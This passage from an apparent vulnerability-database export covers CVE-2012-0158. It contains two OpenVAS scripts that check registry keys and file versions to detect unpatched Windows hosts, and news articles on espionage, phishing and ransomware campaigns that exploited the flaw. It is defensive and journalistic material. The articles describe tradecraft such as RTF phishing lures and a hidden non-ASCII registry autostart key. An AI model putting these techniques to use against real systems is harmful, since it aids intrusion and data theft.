"###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms12-027.nasl 5366 2017-02-20 13:55:38Z cfi $\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\n Impact Level: System/Application\";\ntag_affected = \"Microsoft SQL Server 2008\n Microsoft Visual Basic 6.0\n Microsoft Commerce Server 2009\n Microsoft SQL Server 2005 Service Pack 4\n Microsoft SQL Server 2000 Service Pack 4\n Microsoft Visual FoxPro 9.0 Service Pack 2\n Microsoft Visual FoxPro 8.0 Service Pack 1\n Microsoft Commerce Server 2007 Service Pack 2\n Microsoft Commerce Server 2002 Service Pack 4\n Microsoft Office 2010 Service Pack 1 and prior\n Microsoft Office 2007 Service Pack 3 and prior\n Microsoft Office 2003 Service Pack 3 and prior\n Microsoft SQL Server 2000 Analysis Services Service Pack 4\";\ntag_insight = \"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 
ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n http://technet.microsoft.com/en-us/security/bulletin/ms12-027\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\";\n\nif(description)\n{\n script_id(902829);\n script_version(\"$Revision: 5366 $\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-02-20 14:55:38 +0100 (Mon, 20 Feb 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name : \"URL\" , value : \"http://secunia.com/advisories/48786\");\n script_xref(name : \"URL\" , value : \"http://www.securitytracker.com/id/1026904\");\n script_xref(name : \"URL\" , value : \"http://technet.microsoft.com/en-us/security/bulletin/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Variables Initialization\nkey = \"\";\nver = \"\";\nkeys = \"\";\nitem = \"\";\npath = \"\";\nsysPath = \"\";\nbizName = \"\";\ndllVer = NULL;\nsysVer = NULL;\nexeVer = NULL;\n\n## Check for Windows OS\nif(!get_kb_item(\"SMB/WindowsVersion\")){\n exit(0);\n}\n\n## Get System Path\nsysPath = smb_get_systemroot();\nif(! sysPath){\n exit(0);\n}\n\n## Get Version from Mscomctl.Ocx file\nsysVer = fetch_file_version(sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(! sysVer){\n exit(0);\n}\n\n## Check for Microsoft Office 2003, 2007 and 2010\nif(get_kb_item(\"MS/Office/Ver\") =~ \"^[11|12|14].*\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Microsoft BizTalk Server 2002\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for SQL Server 2005 and 2008\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server \" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft Commerce Server 2002, 2007 or 2009\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n 
security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Visual Basic 6.0\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n}\n\n## Check for Visual FoxPro 8.0 and 9.0\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000 Analysis Services\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n\n## Check for Microsoft SQL Server 2000\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n ## Check for GDR and QFE versions\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message(0);\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-01-08T14:04:19", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": 
"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2020-01-07T00:00:00", "id": "OPENVAS:1361412562310902829", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902829", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\n#\n# Authors:\n# Sooraj KS <kssooraj@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2012 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902829\");\n script_version(\"2020-01-07T09:06:32+0000\");\n script_bugtraq_id(52911);\n script_cve_id(\"CVE-2012-0158\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2020-01-07 09:06:32 +0000 (Tue, 07 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 11:11:11 +0530 (Wed, 11 Apr 2012)\");\n script_name(\"Microsoft Windows Common Controls Remote Code Execution Vulnerability (2664258)\");\n script_xref(name:\"URL\", value:\"http://www.securitytracker.com/id/1026904\");\n script_xref(name:\"URL\", value:\"https://docs.microsoft.com/en-us/security-updates/securitybulletins/2012/ms12-027\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_office_products_version_900032.nasl\");\n script_mandatory_keys(\"SMB/WindowsVersion\");\n script_require_ports(139, 445);\n\n script_tag(name:\"impact\", value:\"Successful exploitation could allow an attacker to execute arbitrary code\n within the context of the application.\");\n\n script_tag(name:\"affected\", value:\"- Microsoft SQL Server 2008\n\n - Microsoft Visual Basic 6.0\n\n - Microsoft Commerce Server 2009\n\n - Microsoft SQL Server 2005 Service Pack 4\n\n - Microsoft SQL Server 2000 Service Pack 4\n\n - Microsoft Visual FoxPro 9.0 Service Pack 2\n\n - Microsoft Visual FoxPro 8.0 Service Pack 1\n\n - Microsoft Commerce Server 2007 Service Pack 2\n\n - 
Microsoft Commerce Server 2002 Service Pack 4\n\n - Microsoft Office 2010 Service Pack 1 and prior\n\n - Microsoft Office 2007 Service Pack 3 and prior\n\n - Microsoft Office 2003 Service Pack 3 and prior\n\n - Microsoft SQL Server 2000 Analysis Services Service Pack 4\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an error within the ListView, ListView2, TreeView\n and TreeView2 ActiveX controls in MSCOMCTL.OCX in the Common Controls and can\n be exploited to corrupt memory.\");\n\n script_tag(name:\"solution\", value:\"The vendor has released updates. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS12-027.\");\n\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nsysPath = smb_get_systemroot();\nif(!sysPath){\n exit(0);\n}\n\nsysVer = fetch_file_version(sysPath:sysPath, file_name:\"system32\\Mscomctl.Ocx\");\nif(!sysVer){\n exit(0);\n}\n\nofficeVer = get_kb_item(\"MS/Office/Ver\");\n\nif(officeVer && officeVer =~ \"^1[124]\\.\")\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\BizTalk Server\\1.0\";\nif(registry_key_exists(key:key))\n{\n bizName = registry_get_sz(key:key, item:\"ProductName\");\n if(\"Microsoft BizTalk Server 2002\" >< bizName)\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nforeach ver (make_list(\"2005\", \"10\"))\n{\n key = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\" +\n \"\\Uninstall\\Microsoft SQL Server 
\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkeys = make_list(\"SOFTWARE\\Microsoft\\Commerce Server\",\n \"SOFTWARE\\Microsoft\\Commerce Server 2007\",\n \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\"+\n \"\\Microsoft Commerce Server 2009\");\nforeach key (keys)\n{\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Visual Basic\\6.0\";\nif(registry_key_exists(key:key))\n{\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n}\n\nforeach ver (make_list(\"8.0\", \"9.0\"))\n{\n key = \"SOFTWARE\\Microsoft\\VisualFoxPro\\\" + ver;\n if(registry_key_exists(key:key))\n {\n if(version_is_less(version:sysVer, test_version:\"6.1.98.33\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000 Analysis Services\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n dllVer = fetch_file_version(sysPath:path, file_name:\"bin\\msmdctr80.dll\");\n if(dllVer)\n {\n if(version_is_less(version:dllVer, test_version:\"8.0.2302.0\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n\nkey = \"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Microsoft SQL \" +\n \"Server 2000\";\nif(registry_key_exists(key:key))\n{\n path = registry_get_sz(key:key, item:\"InstallLocation\");\n exeVer = 
fetch_file_version(sysPath:path, file_name:\"Binn\\sqlservr.exe\");\n if(exeVer)\n {\n if(version_is_less(version:exeVer, test_version:\"2000.80.2065.0\") ||\n version_in_range(version:exeVer, test_version:\"2000.80.2300.0\", test_version2:\"2000.80.2300.9\"))\n {\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n exit(0);\n }\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2017-01-08T18:01:20", "description": "[](<http://2.bp.blogspot.com/-M8cMLC5NtdI/Ua4XqeyaL9I/AAAAAAAAV9g/soz4j7rFh4E/s1600/Surveillance+malware+targets+350+high+profile+victims+in+40+countries.png>)\n\nA global cyber espionage campaign affecting over 350 high profile victims in 40 countries, appears to be the work of [Chinese hackers](<http://thehackernews.com/2013/02/chinese-government-targets-uyghur-group.html>) using a Surveillance malware called \"**_NetTraveler_**\".\n\n \n\n\nKaspersky Lab\u2019s team of experts published a new research [report](<http://www.securelist.com/en/downloads/vlpdfs/kaspersky-the-net-traveler-part1-final.pdf>) about NetTraveler, which is a family of malicious programs used by APT cyber crooks. The main targets of the campaign, which has been running since 2004, are Tibetan/Uyghur activists, government institutions, contractors and embassies, as well as the oil and gas industry.\n\n[Spear phishing](<http://thehackernews.com/2011/01/spear-phishing-latest-ploy-to-steal.html>) emails were used to trick targets into opening [malicious documents](<http://thehackernews.com/2012/01/print-of-one-malicious-document-can.html>). The attackers are using two vulnerabilities in Microsoft Office including Exploit.MSWord.CVE-2010-333, Exploit.Win32.CVE-2012-0158, which have been patched but remain highly-popular on the hacking scene, and have run NetTraveler alongside other malware. 
\n \nC&C servers are used to install additional malware on infected machines and exfiltrate stolen data, and more than 22 gigabytes of stolen data are stored on NetTraveler\u2019s C&C servers.\n\n \n\n\nAccording to researchers, the largest number of samples they observed were created between 2010 and 2013. The largest number of infections has been spotted in Mongolia, India and Russia, and also in China, South Korea, Germany, the US, Canada, the UK, Austria, Japan, Iran, Pakistan, Spain and Australia.\n\n \n\n\nResearchers believe that the hacking team behind this attack consists of 50 individuals, most of whom speak Chinese natively but also have a decent level of English.\n\n \n\n\nSix victims were also hit by the [Red October](<http://thehackernews.com/2013/01/operation-red-october-cyber-espionage.html>) attackers, whom Kaspersky had profiled last year. Those victims included a military contractor in Russia and an embassy in Iran.\n", "cvss3": {}, "published": "2013-06-04T05:39:00", "type": "thn", "title": "Surveillance malware targets 350 high profile victims in 40 countries", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-06-04T16:39:05", "id": "THN:D9114576EA7861D9D8859B9EF23814E4", "href": "http://thehackernews.com/2013/06/surveillance-malware-targets-350-high.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-01-08T18:01:13", "description": "None\n", "cvss3": {}, "published": "2013-10-27T05:37:00", "type": "thn", "title": "Terminator RAT became more sophisticated in recent APT attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2013-10-27T16:41:46", "id": "THN:DC21EBE0272DEA3B043A3EB0A5B5B1DA", "href": "http://thehackernews.com/2013/10/terminator-rat-became-more.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T10:06:42", "description": 
"[](<https://2.bp.blogspot.com/-UbDg_2GB7PM/UvnrUMicegI/AAAAAAAAaEM/KiTNTDtBQro/s1600/Valentine-day-malware-hacking.jpg>)\n\n_Valentine's Day__ _\\- a day of hearts, Chocolates, Flowers and Celebrations when people express their emotions to their loved ones and most of us send E-cards, purchase special gifts with the help of various Online Shop Sites and many other tantrums making them feel special.\n\n \n\n\nWhile you are busy in Googling ideal gifts for your loved ones, the Cyber thieves are also busy in taking advantage of such events by spreading various [malware](<https://thehackernews.com/search/label/Malware>), phishing campaigns and fraud schemes as these days come out to be a goldmine for the cyber criminals.\n\n \n\n\n_Online Shopping Scams_ are popular among Cyber criminals as it is the easiest way for hackers to steal money in easy and untraceable ways.\n\n \n\n\nSecurity Researchers at Anti virus firm - _Trend Micro_ [discovered](<http://blog.trendmicro.com/trendlabs-security-intelligence/breaking-up-with-valentines-day-online-threats/>) various Valentine's Day threats which are common at such occasion i.e. A flower-delivery service and it appears to be a normal promotional e-mail, but the links actually lead to various survey scams.\n\n \n\n\nThe Malware threats also arrive during this season of love. The researchers recently found a new attack targeting Canadian users looking for a Romantic Dinner Giveaway. The email appears to be about a special Valentine Dinner, and has an attachment which is actually a malicious _.RTF_ file (_detected as TROJ_ARTIEF. 
VDY_), using a known buffer overflow vulnerability (_[CVE-2012-0158](<https://technet.microsoft.com/en-us/security/bulletin/ms12-027>)_) in Windows Common Controls, allows remote code execution to drop a backdoor (BKDR_INJECT.VDY) onto the affected system.\n\n[](<https://2.bp.blogspot.com/-9TVw2Nf0xD0/UvnqlXFjJGI/AAAAAAAAaEE/uNtMfYZkQ6w/s1600/Valentine-day-malware-hacking.png>)\n\nThis Valentine's Day, with the popularity of Android phones and iPhones, it seems practical to impress your beloved by sending e-cards using various Valentine's Day Apps, but you never realize that despite sending E-cards, you are also inflicting an [Android](<https://thehackernews.com/search/label/Android>) malware on your beloveds which could be worse to your relation.\n\n \n\n\nThe security researchers from _Bitdefender_ recently released a report, noted how such Valentine's Day apps could demand undue permissions, that could violate users\u2019 privacy, rack up users\u2019 phone bills, and even possibly cause identity theft.\n\n \n\n\nThe researchers have detected various malware-inflicted apps, one of which is \u2018**Valentine\u2019s Day 2014 Wallpaper**.\u2019 The app records user\u2019s location and his browsing history in the process without having any justification for asking permissions.\n\n \n\n\nAnother is \u2018**Valentine's Day Frames**\u2019, the app that reads the user\u2019s contacts list, which is logically an odd request because the app is only intended to adorn user\u2019s romantic photographs with Valentine's Day themed photo frames. _So what\u2019s the use of reading your contact list for this app?_\n\n \n\n\nOne more, \u2018**Love Letters for Chat, Status**\u2019 which allows you to share love quotes, letters, and even poems to your dearest friends, but the app is capable to send emails, make phone calls, change audio settings, and even modify calendar events without your permission. 
So gifting this to your beloved may bring an end to your sweet relationship.\n\n \n\n\nSeasonal deals and offers are commonplace, so it is the user's own duty to spot what\u2019s malicious and what\u2019s not. Following are some tips every Internet user must follow:\n\n * Do not open emails or click links from unknown sources.\n * Do not run attached files that come from unknown sources, especially these days.\n * The biggest bargains aren\u2019t always the biggest steals. If an offer sounds too good to be true, it probably is; if you are making purchases online, prefer a reputed shopping site and type the address of the store into the browser rather than following any links that have been sent to you.\n * Have an effective security solution installed on your system that is capable of detecting both known and new malware strains.\n\nDon\u2019t spread malware... Spread love :) Stay safe! Stay tuned to The Hacker News.\n", "cvss3": {}, "published": "2014-02-10T22:26:00", "type": "thn", "title": "Beware! Cyber Criminals may spoil your Valentine's Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-02-11T09:26:36", "id": "THN:28D18D871A6086136DFA7958D9C516E0", "href": "https://thehackernews.com/2014/02/beware-cyber-criminals-may-spoil-your.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-27T09:17:09", "description": "[](<https://3.bp.blogspot.com/-8CkpwB8JPN8/U999kcWKl_I/AAAAAAAAcqQ/EdVV47WNr10/s1600/Poweliks-persistent-malware-windows-registry.jpg>)\n\nMalware is nothing but malicious files stored on an infected computer system in order to damage the system, steal sensitive data from it or perform other malicious activities. 
But security researchers have uncovered a new and sophisticated piece of malware that infects systems and steals data without installing any file onto the targeted system.\n\n \n\n\nResearchers dubbed this [persistent malware](<https://thehackernews.com/search/label/Advanced%20Persistent%20Threat>) as **Poweliks**, which resides in the computer registry only and is therefore not easily detectable as other typical malware that installs files on the affected system which can be scanned by antivirus or anti-malware Software.\n\n \n\n\nAccording to [Paul Rascagneres](<https://twitter.com/r00tbsd>), Senior Threat Researcher, Malware analyst at GData software, due to the malware\u2019s subsequent and step-after-step execution of code, the feature set was similar to a stacking principles of Matryoshka Doll approach.\n\n \n\n\nPaul has made a number of name ripping malware and bots to uncover and undermine cyber crimes. He won last years' Pwnie Award at _Black Hat Las Vegas_ for tearing through the infrastructure of Chinese hacker group APT1.\n\n \n\n\nIn order to infect a system, the [malware](<https://thehackernews.com/search/label/Malware>) spreads via emails through a malicious Microsoft Word document and after that it creates an encoded autostart registry key and to remain undetectable it keeps the registry key hidden, Rascagneres says.\n\n \n\n\nThe malware then creates and executes shellcode, along with a payload Windows binary that tried to connect to \u2018_hard coded IP addresses_\u2019 in an effort to receive further commands from the attacker.\n\n> \"_All activities are stored in the registry. No file is ever created,\"_ Rascagneres said in a [blog post](<https://blog.gdatasoftware.com/blog/article/poweliks-the-persistent-malware-without-a-file.html>). 
_\"So, attackers are able to circumvent classic anti-malware file scan techniques with such an approach and are able to carry out any desired action when they reach the innermost layer of [a machine] even after a system re-boot._\u201d\n\n> _\"To prevent attacks like this, antivirus solutions have to either catch the initial Word document before it is executed (if there is one), preferably before it reached the customer's email inbox.\"_\n\nTo create an autostart mechanism, the malware creates a registry, which is a non-ASCII character key, as Windows Regedit cannot read or open the non-ASCII key entry.\n\n \n\n\n**CAPABILITIES OF POWELIKS MALWARE**\n\nPoweliks malware is quite dangerous and can perform a number of malicious activities. The malware can: \n\n * Download any payload\n * Install spyware on the infected computer to harvest users\u2019 personal information or business documents\n * Install banking Trojans in order to steal money\n * Install any other type of malicious software that can fulfil the needs of the attackers\n * used in botnet structures\n * generate immense revenue through ad-fraud\n\n_The non-ASCII trick is a tool which the Microsoft created and uses in order to hide its source code from being copied or tampered with, but this feature was later cracked by a security researcher. _\n\n[](<https://1.bp.blogspot.com/-wwHjFi73t9w/U998OfeEGVI/AAAAAAAAcqI/-WWnTsYObIA/s1600/poweliks_regedit_.png>)\n\nThe security and malware researchers on the _KernelMode.info_ forum last month analysed a sample which is dropped by a Microsoft Word document that exploited the vulnerability described in CVE-2012-0158, which affected Microsoft products including Microsoft Office. 
\n\n \n\n\nThe malware authors distributed the malware as an attachment of fake Canada Post and/or USPS email allegedly holding tracking information.\n\n> \"_This trick prevents a lot of tools from processing this malicious entry at all and it could generate a lot of trouble for incident response teams during the analysis. The mechanism can be used to start any program on the infected system and this makes it very powerful,_\" Rascagneres said.\n", "cvss3": {}, "published": "2014-08-04T01:37:00", "type": "thn", "title": "POWELIKS \u2014 A Persistent Windows Malware Without Any Installer File", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0158"], "modified": "2014-08-04T12:49:05", "id": "THN:82833AE00002BB0F41BEF5FD8972FAFB", "href": "https://thehackernews.com/2014/08/poweliks-persistent-windows-malware.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2022-05-09T12:38:31", "description": "[](<https://thehackernews.com/images/-NZsRCoMmOn8/XpWH1q07tzI/AAAAAAAAAN8/WwbAeoGUIyUyD1p1LTfUXvZao-TclGL-QCLcBGAsYHQ/s728-e100/ransomware-healthcare.jpg>)\n\nAs hospitals around the world are struggling to respond to the coronavirus crisis, cybercriminals\u2014with no conscience and empathy\u2014are continuously targeting healthcare organizations, research facilities, and other governmental organizations with ransomware and malicious information stealers. 
\n \nThe new research, published by Palo Alto Networks and shared with The Hacker News, [confirmed](<https://unit42.paloaltonetworks.com/covid-19-themed-cyber-attacks-target-government-and-medical-organizations/>) that \"the threat actors who profit from cybercrime will go to any extent, including targeting organizations that are in the front lines and responding to the pandemic on a daily basis.\" \n \nWhile the security firm didn't name the latest victims, it said a Canadian government healthcare organization and a Canadian medical research university both suffered ransomware attacks, as criminal groups seek to exploit the crisis for financial gain. \n \nThe attacks were detected between March 24 and March 26 and were initiated as part of the coronavirus-themed phishing campaigns that have become widespread in recent months. \n \nPalo Alto Networks' disclosure comes as The U.S. Department of Health and Human Services ([HHS](<https://www.reuters.com/article/us-healthcare-coronavirus-usa-cyberattac/cyberattack-hits-u-s-health-department-amid-coronavirus-crisis-idUSKBN21320V>)), biotechnology firm [10x Genomics](<https://www.bloomberg.com/news/articles/2020-04-01/hackers-without-conscience-demand-ransom-from-health-providers>), [Brno University Hospital](<https://www.novinky.cz/internet-a-pc/bezpecnost/clanek/fakultni-nemocnice-v-brne-je-cilem-pocitacoveho-utoku-potvrdil-c-40316531>) in the Czech Republic, and [Hammersmith Medicines Research](<https://www.computerweekly.com/news/252480425/Cyber-gangsters-hit-UK-medical-research-lorganisation-poised-for-work-on-Coronavirus>) have been hit by [cyberattacks](<https://twitter.com/AltShiftPrtScn/status/1243166479903834112>) in the past few weeks. 
\n \n\n\n## Delivering Ransomware by Exploiting CVE-2012-0158\n\n \nAccording to the researchers, the campaign began with malicious emails sent from a spoofed address mimicking the World Health Organization (noreply@who[.]int) that were sent to a number of individuals associated with the healthcare organization that's actively involved in COVID-19 response efforts. \n \nThe email lures contained a rich text format (RTF) document named \"_20200323-sitrep-63-covid-19.doc_,\" which, when opened, attempted to deliver EDA2 ransomware by exploiting a known buffer overflow vulnerability ([CVE-2012-0158](<https://nvd.nist.gov/vuln/detail/CVE-2012-0158>)) in Microsoft's ListView / TreeView ActiveX controls in MSCOMCTL.OCX library. \n \n\n\n[](<https://thehackernews.com/images/-tDmarl5Chgc/XpWFNQpROzI/AAAAAAAAANw/Xe1Femp0QBIB0YfJayeZi_qwxyY3ho_bwCLcBGAsYHQ/s728-e100/phishing-malware-email.jpg>)\n\n \n\"It is interesting to note that even though the file name clearly references a specific date (March 23, 2020), the file name was not updated over the course of the campaign to reflect current dates,\" Palo Alto Networks researchers noted. \n \n\"It is also interesting that the malware authors did not attempt to make their lures appear legitimate in any way; it is clear from the first page of the document that something is amiss.\" \n \nUpon execution, the ransomware binary contacts the command-and-control (C2) server to download an image that serves as the main ransomware infection notification on the victim's device, and subsequently transmits the host details to create a custom key to encrypt the files on the system's desktop with a \".locked20\" extension. \n \nAside from receiving the key, the infected host uses an HTTP Post request to send the decryption key, encrypted using AES, to the C2 server. 
